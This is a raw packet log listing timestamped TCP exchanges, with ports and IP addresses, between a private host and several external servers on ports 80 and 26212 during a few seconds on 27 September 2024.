Sep 27, 2024 04:21:18.482717991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482722044 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482729912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482742071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482747078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482753992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482769012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.482786894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482786894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.482816935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.483643055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.483653069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.483746052 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.502382994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.502402067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.502414942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.502424955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.502437115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.502438068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.502449036 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.502463102 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.502475023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.502501965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.502501965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.502543926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.504771948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504882097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504892111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504904032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504914999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504934072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504935026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.504935026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.504947901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504966974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504977942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.504983902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.504985094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.504990101 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505002975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505028009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505028009 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505043030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505054951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505067110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505079031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505079985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505079031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505104065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505104065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505145073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505146980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505182981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505208969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505247116 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505265951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505295038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505306959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505319118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505321980 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505371094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505383015 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.505388975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505428076 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.505428076 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.507190943 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.512171030 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.524813890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524841070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524857998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524871111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524890900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524895906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.524895906 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.524904013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524916887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524934053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.524935961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524945021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.524949074 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524962902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524980068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.524985075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.524985075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.524995089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.525007963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.525010109 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.525022984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.525032997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.525060892 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.525060892 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.525134087 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.564913034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.564929962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.564951897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.564964056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.564975977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.564982891 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.564985991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565006018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565026999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565031052 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565031052 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565040112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565046072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565053940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565067053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565079927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565085888 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565092087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565104008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565114975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565116882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565129042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565155029 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565175056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565568924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565581083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565599918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565618992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565624952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565644026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565663099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565668106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565668106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565675020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565682888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565687895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565713882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565716982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565747976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565759897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565781116 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565814018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565833092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565845966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565857887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565867901 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.565876961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.565912962 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574570894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574603081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574614048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574632883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574644089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574655056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574667931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574680090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574686050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574686050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574721098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574721098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574779987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574791908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574803114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574815989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574826002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574836016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574850082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574850082 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574865103 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574868917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574887037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574901104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574904919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574904919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574913025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574923992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574937105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574949026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574949026 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.574959993 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574970007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.574992895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575016022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575016975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575030088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575047016 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575059891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575071096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575083971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575097084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575109005 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575112104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575112104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575134993 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575184107 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575217962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575229883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575241089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575252056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575288057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575288057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575325966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575337887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575349092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575376034 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575402975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575418949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575431108 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575442076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575453997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575479031 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575484037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575488091 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575498104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575510979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.575537920 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.575552940 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.594815969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.594872952 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.594883919 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.594896078 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.594896078 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.594911098 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.594913960 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.594923973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.594933987 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.594938040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.594949961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.594958067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.594990969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.594990969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597322941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597349882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597361088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597385883 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597404957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597417116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597429037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597440958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597451925 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597451925 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597455025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597465992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597495079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597507954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597529888 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597541094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597559929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597573042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597573042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597583055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597619057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597639084 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597652912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597664118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597681046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597728968 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597774029 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597820044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597830057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597855091 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597884893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597908974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597922087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597933054 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597944021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597954988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.597971916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.597971916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.598011971 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617260933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617278099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617300987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617321014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617332935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617336988 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617346048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617352962 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617358923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617371082 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617381096 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617383003 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617398024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617402077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617422104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617423058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617440939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617446899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617453098 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617471933 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617475986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617475986 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617486000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617496014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617501020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617512941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.617531061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617531061 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.617558002 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.657366991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:18.657443047 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:18.772115946 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:18.777069092 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:18.813164949 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:18.813354015 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:18.965209961 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.006221056 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.108994007 CEST	80	49726	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:19.109045982 CEST	49726	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:19.178329945 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183403969 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183417082 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183434010 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183442116 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183465958 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183475971 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183485985 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183516979 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183516026 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183561087 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183569908 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183593988 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183595896 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183603048 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183607101 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183650017 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183650017 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183659077 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183670044 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183697939 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183706999 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183716059 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183722973 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183741093 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183753967 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183763981 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183793068 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183804989 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:19.183824062 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:19.183866978 CEST	26212	49714	95.179.250.45	192.168.2.5
